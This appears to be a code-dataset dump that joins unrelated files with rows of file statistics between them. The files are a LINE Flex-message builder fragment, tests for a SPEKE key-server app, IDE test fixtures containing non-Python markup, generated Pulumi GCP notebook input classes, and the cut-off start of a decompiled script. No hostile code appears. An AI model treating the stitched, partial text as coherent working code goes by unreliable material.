"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "SiteName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": caller,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JobDescriptions :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": job_description,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "FlsName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_mame,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MobilePhoneFLS :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_phone,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MangementName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": management,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "TypeOfJob :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": type_job,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JLA/RAReviewed :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": jla_ra,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkerInvolved ? : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": any_ssw,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Observation ? :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": physical,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CBRE FM : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fm,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Remarks :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": remark,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CheckIn Time",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(startwork),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
}
]
}
}
}
return data
print("OK")
| 40.32746
| 92
| 0.21666
| 5,242
| 121,305
| 4.952499
| 0.039107
| 0.121105
| 0.081353
| 0.134818
| 0.95135
| 0.943454
| 0.939294
| 0.936559
| 0.934325
| 0.929163
| 0
| 0.026973
| 0.67543
| 121,305
| 3,008
| 93
| 40.32746
| 0.631413
| 0.019909
| 0
| 0.744523
| 0
| 0
| 0.157397
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002474
| false
| 0
| 0.000353
| 0
| 0.007067
| 0.015901
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b46aa8e9e4eb998d9503b642f6bf1e79e4978c60
| 5,914
|
py
|
Python
|
tests/test_app.py
|
t-kigi/speke-chalice
|
b737d238dcccb6922c62a7a91ce6d4da208282bc
|
[
"Apache-2.0"
] | null | null | null |
tests/test_app.py
|
t-kigi/speke-chalice
|
b737d238dcccb6922c62a7a91ce6d4da208282bc
|
[
"Apache-2.0"
] | null | null | null |
tests/test_app.py
|
t-kigi/speke-chalice
|
b737d238dcccb6922c62a7a91ce6d4da208282bc
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from unittest.mock import MagicMock, patch
import app as target
def test_empty_request():
    """An empty request body must make the API answer 500 with a parse error."""
    target.app.current_request = MagicMock(raw_body=b'')
    with patch('os.environ') as env_mock:
        env_mock.get.return_value = '81376844-f976-481e-a84e-cc25d39b0b33'
        result = target.copy_protection().to_dict()
        assert result['statusCode'] == 500
        assert 'no element found' in result['body'].decode()
# Sample CPIX/SPEKE request document used by the tests below.
INPUT_XML = b'<?xml version="1.0" encoding="UTF-8"?><cpix:CPIX id="5E99137A-BD6C-4ECC-A24D-A3EE04B4E011" xmlns:cpix="urn:dashif:org:cpix" xmlns:pskc="urn:ietf:params:xml:ns:keyprov:pskc" xmlns:speke="urn:aws:amazon:com:speke"><cpix:ContentKeyList><cpix:ContentKey kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"></cpix:ContentKey></cpix:ContentKeyList><cpix:DRMSystemList><cpix:DRMSystem kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe" systemId="81376844-f976-481e-a84e-cc25d39b0b33"> <cpix:ContentProtectionData /> <speke:KeyFormat /> <speke:KeyFormatVersions /> <speke:ProtectionHeader /> <cpix:PSSH /> <cpix:URIExtXKey /></cpix:DRMSystem></cpix:DRMSystemList><cpix:ContentKeyPeriodList><cpix:ContentKeyPeriod id="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622" index="11425"/></cpix:ContentKeyPeriodList><cpix:ContentKeyUsageRuleList><cpix:ContentKeyUsageRule kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"><cpix:KeyPeriodFilter periodId="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622"/></cpix:ContentKeyUsageRule></cpix:ContentKeyUsageRuleList></cpix:CPIX>' # noqa
# Expected successful response: same document with the content key secret and
# the key URL (base64) filled in by the handler.
EXPECTED_XML = b'<cpix:CPIX xmlns:cpix="urn:dashif:org:cpix" xmlns:pskc="urn:ietf:params:xml:ns:keyprov:pskc" xmlns:speke="urn:aws:amazon:com:speke" id="5E99137A-BD6C-4ECC-A24D-A3EE04B4E011"><cpix:ContentKeyList><cpix:ContentKey kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"><cpix:Data><pskc:Secret><pskc:PlainValue>MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA=</pskc:PlainValue></pskc:Secret></cpix:Data></cpix:ContentKey></cpix:ContentKeyList><cpix:DRMSystemList><cpix:DRMSystem kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe" systemId="81376844-f976-481e-a84e-cc25d39b0b33"> <cpix:ContentProtectionData /> <speke:KeyFormat /> <speke:KeyFormatVersions /> <speke:ProtectionHeader /> <cpix:PSSH /> <cpix:URIExtXKey>aHR0cHM6Ly9leGFtcGxlLmNvbS9rZXlzLzAwMDAua2V5</cpix:URIExtXKey></cpix:DRMSystem></cpix:DRMSystemList><cpix:ContentKeyPeriodList><cpix:ContentKeyPeriod id="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622" index="11425" /></cpix:ContentKeyPeriodList><cpix:ContentKeyUsageRuleList><cpix:ContentKeyUsageRule kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"><cpix:KeyPeriodFilter periodId="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622" /></cpix:ContentKeyUsageRule></cpix:ContentKeyUsageRuleList></cpix:CPIX>' # noqa
@patch('app.KeyCache')
def test_sample_request(mock):
    """A valid sample request yields 200 and the fully populated CPIX document.

    KeyCache is mocked so no real key storage or network is touched.
    """
    # mocked key cache
    mock().get.return_value = b'00000000000000000000000000000000'
    mock().url.return_value = 'https://example.com/keys/0000.key'
    # Reuse the module-level sample document instead of duplicating the
    # 1 kB XML literal (it was byte-identical to INPUT_XML).
    target.app.current_request = MagicMock(raw_body=INPUT_XML)
    with patch('os.environ') as menv:
        menv.get.return_value = '81376844-f976-481e-a84e-cc25d39b0b33'
        res = target.copy_protection().to_dict()
        assert res['statusCode'] == 200
        assert res['body'] == EXPECTED_XML
@patch('app.KeyCache')
def test_error1_request(mock):
    """Error case: the request's DRMSystem carries systemId="ERROR", which does
    not match the configured system id, so the API must answer 500."""
    # mocked key cache
    mock().get.return_value = b'00000000000000000000000000000000'
    mock().url.return_value = 'https://example.com/keys/0000.key'
    # Same document as INPUT_XML except for systemId="ERROR".
    # NOTE(review): os.environ is patched without a configured return value, so
    # presumably the mismatch (not the environment) triggers the 500 — confirm.
    raw_body = b'<?xml version="1.0" encoding="UTF-8"?><cpix:CPIX id="5E99137A-BD6C-4ECC-A24D-A3EE04B4E011" xmlns:cpix="urn:dashif:org:cpix" xmlns:pskc="urn:ietf:params:xml:ns:keyprov:pskc" xmlns:speke="urn:aws:amazon:com:speke"><cpix:ContentKeyList><cpix:ContentKey kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"></cpix:ContentKey></cpix:ContentKeyList><cpix:DRMSystemList><cpix:DRMSystem kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe" systemId="ERROR"> <cpix:ContentProtectionData /> <speke:KeyFormat /> <speke:KeyFormatVersions /> <speke:ProtectionHeader /> <cpix:PSSH /> <cpix:URIExtXKey /></cpix:DRMSystem></cpix:DRMSystemList><cpix:ContentKeyPeriodList><cpix:ContentKeyPeriod id="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622" index="11425"/></cpix:ContentKeyPeriodList><cpix:ContentKeyUsageRuleList><cpix:ContentKeyUsageRule kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"><cpix:KeyPeriodFilter periodId="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622"/></cpix:ContentKeyUsageRule></cpix:ContentKeyUsageRuleList></cpix:CPIX>' # noqa
    target.app.current_request = MagicMock(raw_body=raw_body)
    with patch('os.environ'):
        res = target.copy_protection().to_dict()
        assert res['statusCode'] == 500
| 111.584906
| 1,230
| 0.762428
| 701
| 5,914
| 6.376605
| 0.188302
| 0.02953
| 0.040268
| 0.051007
| 0.917673
| 0.907383
| 0.899776
| 0.891051
| 0.891051
| 0.891051
| 0
| 0.141023
| 0.077951
| 5,914
| 52
| 1,231
| 113.730769
| 0.678709
| 0.032296
| 0
| 0.548387
| 0
| 0.129032
| 0.814047
| 0.703248
| 0
| 0
| 0
| 0
| 0.16129
| 1
| 0.096774
| false
| 0
| 0.064516
| 0
| 0.16129
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b47f64aeb7d5b04e42ddf73ec0b6109f28d461df
| 192
|
py
|
Python
|
python/testData/inspections/PyArgumentListInspection/unicodeConstructor.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyArgumentListInspection/unicodeConstructor.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyArgumentListInspection/unicodeConstructor.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | 1
|
2020-11-27T10:36:50.000Z
|
2020-11-27T10:36:50.000Z
|
print(unicode())
print(unicode(''))
print(unicode('', 'utf-8'))
print(unicode('', 'utf-8', 'ignore'))
print(unicode('', 'utf-8', 'ignore', <warning descr="Unexpected argument">foo</warning>))
| 32
| 89
| 0.645833
| 24
| 192
| 5.166667
| 0.416667
| 0.483871
| 0.362903
| 0.387097
| 0.354839
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01676
| 0.067708
| 192
| 5
| 90
| 38.4
| 0.675978
| 0
| 0
| 0
| 0
| 0
| 0.239583
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c32c16e756be6b98c726b9e6b7d262fc4db468e4
| 144
|
py
|
Python
|
app/utils.py
|
dormantman/simple-insurance
|
fe54aa75fcecebc222d3e8ce734ff8aed737d6fe
|
[
"MIT"
] | null | null | null |
app/utils.py
|
dormantman/simple-insurance
|
fe54aa75fcecebc222d3e8ce734ff8aed737d6fe
|
[
"MIT"
] | null | null | null |
app/utils.py
|
dormantman/simple-insurance
|
fe54aa75fcecebc222d3e8ce734ff8aed737d6fe
|
[
"MIT"
] | null | null | null |
from tortoise.contrib.fastapi import HTTPNotFoundError
def template_for_404():
    """Return the extra-responses mapping that documents the 404 error model."""
    return {"responses": {404: {"model": HTTPNotFoundError}}}
| 24
| 62
| 0.777778
| 16
| 144
| 6.875
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046875
| 0.111111
| 144
| 5
| 63
| 28.8
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0.034722
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c3545dfd1f74a393edbd959a402e4ccedcc6cb6a
| 171
|
py
|
Python
|
src/microspeclib/datatypes/__init__.py
|
microspectrometer/microspec
|
c5013e80106789619ad19b3bd91e3e0edb115e42
|
[
"MIT"
] | null | null | null |
src/microspeclib/datatypes/__init__.py
|
microspectrometer/microspec
|
c5013e80106789619ad19b3bd91e3e0edb115e42
|
[
"MIT"
] | null | null | null |
src/microspeclib/datatypes/__init__.py
|
microspectrometer/microspec
|
c5013e80106789619ad19b3bd91e3e0edb115e42
|
[
"MIT"
] | null | null | null |
# Copyright 2020 by Chromation, Inc
# All Rights Reserved by Chromation, Inc
from .bridge import *
from .sensor import *
from .command import *
from .types import *
| 19
| 40
| 0.725146
| 23
| 171
| 5.391304
| 0.608696
| 0.241935
| 0.241935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029412
| 0.204678
| 171
| 8
| 41
| 21.375
| 0.882353
| 0.421053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c361bcb6ecaa0b83fe4ad9000bd372384158619b
| 8,885
|
py
|
Python
|
sdk/python/pulumi_gcp/notebooks/_inputs.py
|
dimpu47/pulumi-gcp
|
38355de300a5768e11c49d344a8165ba0735deed
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/notebooks/_inputs.py
|
dimpu47/pulumi-gcp
|
38355de300a5768e11c49d344a8165ba0735deed
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/notebooks/_inputs.py
|
dimpu47/pulumi-gcp
|
38355de300a5768e11c49d344a8165ba0735deed
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = [
'EnvironmentContainerImageArgs',
'EnvironmentVmImageArgs',
'InstanceAcceleratorConfigArgs',
'InstanceContainerImageArgs',
'InstanceVmImageArgs',
]
@pulumi.input_type
class EnvironmentContainerImageArgs:
    # tfgen-generated input type for a notebook Environment's container image.
    # @pulumi.input_type introspects __init__ and the @pulumi.getter
    # properties, so the structure must not be altered by hand.
    def __init__(__self__, *,
                 repository: pulumi.Input[str],
                 tag: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] repository: The path to the container image repository.
               For example: gcr.io/{project_id}/{imageName}
        :param pulumi.Input[str] tag: The tag of the container image. If not specified, this defaults to the latest tag.
        """
        pulumi.set(__self__, "repository", repository)
        # Optional field: only stored when the caller supplied a value.
        if tag is not None:
            pulumi.set(__self__, "tag", tag)
    @property
    @pulumi.getter
    def repository(self) -> pulumi.Input[str]:
        """
        The path to the container image repository.
        For example: gcr.io/{project_id}/{imageName}
        """
        return pulumi.get(self, "repository")
    @repository.setter
    def repository(self, value: pulumi.Input[str]):
        pulumi.set(self, "repository", value)
    @property
    @pulumi.getter
    def tag(self) -> Optional[pulumi.Input[str]]:
        """
        The tag of the container image. If not specified, this defaults to the latest tag.
        """
        return pulumi.get(self, "tag")
    @tag.setter
    def tag(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tag", value)
@pulumi.input_type
class EnvironmentVmImageArgs:
    # tfgen-generated input type for a notebook Environment's VM image.
    # Exactly one of image_family / image_name is normally used to pick the
    # image, but the provider (not this class) enforces that — both are
    # simply optional here.
    def __init__(__self__, *,
                 project: pulumi.Input[str],
                 image_family: Optional[pulumi.Input[str]] = None,
                 image_name: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] project: The name of the Google Cloud project that this VM image belongs to.
               Format: projects/{project_id}
        :param pulumi.Input[str] image_family: Use this VM image family to find the image; the newest image in this family will be used.
        :param pulumi.Input[str] image_name: Use VM image name to find the image.
        """
        pulumi.set(__self__, "project", project)
        # Optional fields: only stored when the caller supplied a value.
        if image_family is not None:
            pulumi.set(__self__, "image_family", image_family)
        if image_name is not None:
            pulumi.set(__self__, "image_name", image_name)
    @property
    @pulumi.getter
    def project(self) -> pulumi.Input[str]:
        """
        The name of the Google Cloud project that this VM image belongs to.
        Format: projects/{project_id}
        """
        return pulumi.get(self, "project")
    @project.setter
    def project(self, value: pulumi.Input[str]):
        pulumi.set(self, "project", value)
    @property
    @pulumi.getter(name="imageFamily")
    def image_family(self) -> Optional[pulumi.Input[str]]:
        """
        Use this VM image family to find the image; the newest image in this family will be used.
        """
        return pulumi.get(self, "image_family")
    @image_family.setter
    def image_family(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "image_family", value)
    @property
    @pulumi.getter(name="imageName")
    def image_name(self) -> Optional[pulumi.Input[str]]:
        """
        Use VM image name to find the image.
        """
        return pulumi.get(self, "image_name")
    @image_name.setter
    def image_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "image_name", value)
@pulumi.input_type
class InstanceAcceleratorConfigArgs:
    # tfgen-generated input type describing the hardware accelerator attached
    # to a notebook Instance (both fields are required).
    def __init__(__self__, *,
                 core_count: pulumi.Input[float],
                 type: pulumi.Input[str]):
        """
        :param pulumi.Input[float] core_count: Count of cores of this accelerator.
        :param pulumi.Input[str] type: Type of this accelerator.
               Possible values are `ACCELERATOR_TYPE_UNSPECIFIED`, `NVIDIA_TESLA_K80`, `NVIDIA_TESLA_P100`, `NVIDIA_TESLA_V100`, `NVIDIA_TESLA_P4`, `NVIDIA_TESLA_T4`, `NVIDIA_TESLA_T4_VWS`, `NVIDIA_TESLA_P100_VWS`, `NVIDIA_TESLA_P4_VWS`, `TPU_V2`, and `TPU_V3`.
        """
        pulumi.set(__self__, "core_count", core_count)
        # NOTE: the parameter name `type` shadows the builtin; it is kept
        # because the generated public signature must not change.
        pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter(name="coreCount")
    def core_count(self) -> pulumi.Input[float]:
        """
        Count of cores of this accelerator.
        """
        return pulumi.get(self, "core_count")
    @core_count.setter
    def core_count(self, value: pulumi.Input[float]):
        pulumi.set(self, "core_count", value)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Type of this accelerator.
        Possible values are `ACCELERATOR_TYPE_UNSPECIFIED`, `NVIDIA_TESLA_K80`, `NVIDIA_TESLA_P100`, `NVIDIA_TESLA_V100`, `NVIDIA_TESLA_P4`, `NVIDIA_TESLA_T4`, `NVIDIA_TESLA_T4_VWS`, `NVIDIA_TESLA_P100_VWS`, `NVIDIA_TESLA_P4_VWS`, `TPU_V2`, and `TPU_V3`.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class InstanceContainerImageArgs:
    # tfgen-generated input type for a notebook Instance's container image.
    # Structurally identical to EnvironmentContainerImageArgs; kept separate
    # because the generator emits one type per API message.
    def __init__(__self__, *,
                 repository: pulumi.Input[str],
                 tag: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] repository: The path to the container image repository.
               For example: gcr.io/{project_id}/{imageName}
        :param pulumi.Input[str] tag: The tag of the container image. If not specified, this defaults to the latest tag.
        """
        pulumi.set(__self__, "repository", repository)
        # Optional field: only stored when the caller supplied a value.
        if tag is not None:
            pulumi.set(__self__, "tag", tag)
    @property
    @pulumi.getter
    def repository(self) -> pulumi.Input[str]:
        """
        The path to the container image repository.
        For example: gcr.io/{project_id}/{imageName}
        """
        return pulumi.get(self, "repository")
    @repository.setter
    def repository(self, value: pulumi.Input[str]):
        pulumi.set(self, "repository", value)
    @property
    @pulumi.getter
    def tag(self) -> Optional[pulumi.Input[str]]:
        """
        The tag of the container image. If not specified, this defaults to the latest tag.
        """
        return pulumi.get(self, "tag")
    @tag.setter
    def tag(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tag", value)
@pulumi.input_type
class InstanceVmImageArgs:
    # tfgen-generated input type for a notebook Instance's VM image.
    # Structurally identical to EnvironmentVmImageArgs; kept separate because
    # the generator emits one type per API message.
    def __init__(__self__, *,
                 project: pulumi.Input[str],
                 image_family: Optional[pulumi.Input[str]] = None,
                 image_name: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] project: The name of the Google Cloud project that this VM image belongs to.
               Format: projects/{project_id}
        :param pulumi.Input[str] image_family: Use this VM image family to find the image; the newest image in this family will be used.
        :param pulumi.Input[str] image_name: Use VM image name to find the image.
        """
        pulumi.set(__self__, "project", project)
        # Optional fields: only stored when the caller supplied a value.
        if image_family is not None:
            pulumi.set(__self__, "image_family", image_family)
        if image_name is not None:
            pulumi.set(__self__, "image_name", image_name)
    @property
    @pulumi.getter
    def project(self) -> pulumi.Input[str]:
        """
        The name of the Google Cloud project that this VM image belongs to.
        Format: projects/{project_id}
        """
        return pulumi.get(self, "project")
    @project.setter
    def project(self, value: pulumi.Input[str]):
        pulumi.set(self, "project", value)
    @property
    @pulumi.getter(name="imageFamily")
    def image_family(self) -> Optional[pulumi.Input[str]]:
        """
        Use this VM image family to find the image; the newest image in this family will be used.
        """
        return pulumi.get(self, "image_family")
    @image_family.setter
    def image_family(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "image_family", value)
    @property
    @pulumi.getter(name="imageName")
    def image_name(self) -> Optional[pulumi.Input[str]]:
        """
        Use VM image name to find the image.
        """
        return pulumi.get(self, "image_name")
    @image_name.setter
    def image_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "image_name", value)
| 35.54
| 261
| 0.631739
| 1,098
| 8,885
| 4.928051
| 0.10929
| 0.107743
| 0.113842
| 0.073184
| 0.844945
| 0.817594
| 0.806875
| 0.806875
| 0.800222
| 0.800222
| 0
| 0.00527
| 0.252561
| 8,885
| 249
| 262
| 35.682731
| 0.809517
| 0.319977
| 0
| 0.77305
| 1
| 0
| 0.084936
| 0.019238
| 0
| 0
| 0
| 0
| 0
| 1
| 0.205674
| false
| 0
| 0.035461
| 0
| 0.361702
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c37d5166f331610d42f7a0a7b9737c015503fdb1
| 134
|
py
|
Python
|
python/testData/joinLines/ListOfStrings.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/joinLines/ListOfStrings.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/joinLines/ListOfStrings.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
a = [ "AAAAAAA", "BBBBB" "AAAAAAA", "BBBBB" "AAAAAAA",<caret> "BBBBB" "AAAAAAA",
"BBBBB" "AAAAAAA", "BBBBB" "AAAAAAA", "BBBBB"]
| 67
| 81
| 0.58209
| 14
| 134
| 5.571429
| 0.285714
| 0.769231
| 0.974359
| 0.923077
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156716
| 134
| 2
| 82
| 67
| 0.690265
| 0
| 0
| 0
| 0
| 0
| 0.533333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5ee15a2f5e6b800f316f422e0d07101011ec409a
| 417,912
|
py
|
Python
|
python/mamoworld/mochaImportPlus/version_03f30d0a/mochaimport.py
|
smile-jing/NukeToolSet
|
45a2523f3bfa60fbfb03c9702bbdd20cf42cb331
|
[
"MIT"
] | 81
|
2016-05-05T15:04:43.000Z
|
2022-03-21T06:54:22.000Z
|
python/mamoworld/mochaImportPlus/version_03f30d0a/mochaimport.py
|
ensii75/NukeToolSet
|
0c47efc3bc7ca513f902e00a3e2b71404636aae9
|
[
"MIT"
] | 8
|
2018-04-04T16:35:26.000Z
|
2022-02-10T09:56:30.000Z
|
python/mamoworld/mochaImportPlus/version_03f30d0a/mochaimport.py
|
ensii75/NukeToolSet
|
0c47efc3bc7ca513f902e00a3e2b71404636aae9
|
[
"MIT"
] | 51
|
2016-05-07T14:27:42.000Z
|
2022-02-10T05:55:11.000Z
|
#! /usr/bin/env python 2.7 (62211)
# coding=utf-8
# Compiled at: 2015-04-01 08:00:59
__all__ = ['createStabilizedView', 'createCornerPin', 'createTracker3Node', 'createTracker4Node',
'createRotoPaintNodeMI', 'createRotoNodeMI', 'createGridWarpNodeMI', 'createSplineWarpNodeMI',
'createTransformNodeMI', 'createCameraAndPointCloud', 'createCameraRig', 'setUseGizmos',
'applyMochaDataToNode']
import nuke as b
import re
import pprint
def Q(eF):
    # Map each pair in eF (presumably (frame, value) tuples from
    # getPointValues -- TODO confirm) to a nuke AnimationKey.
    # NOTE(review): this file is decompiled Python 2.7 bytecode; the
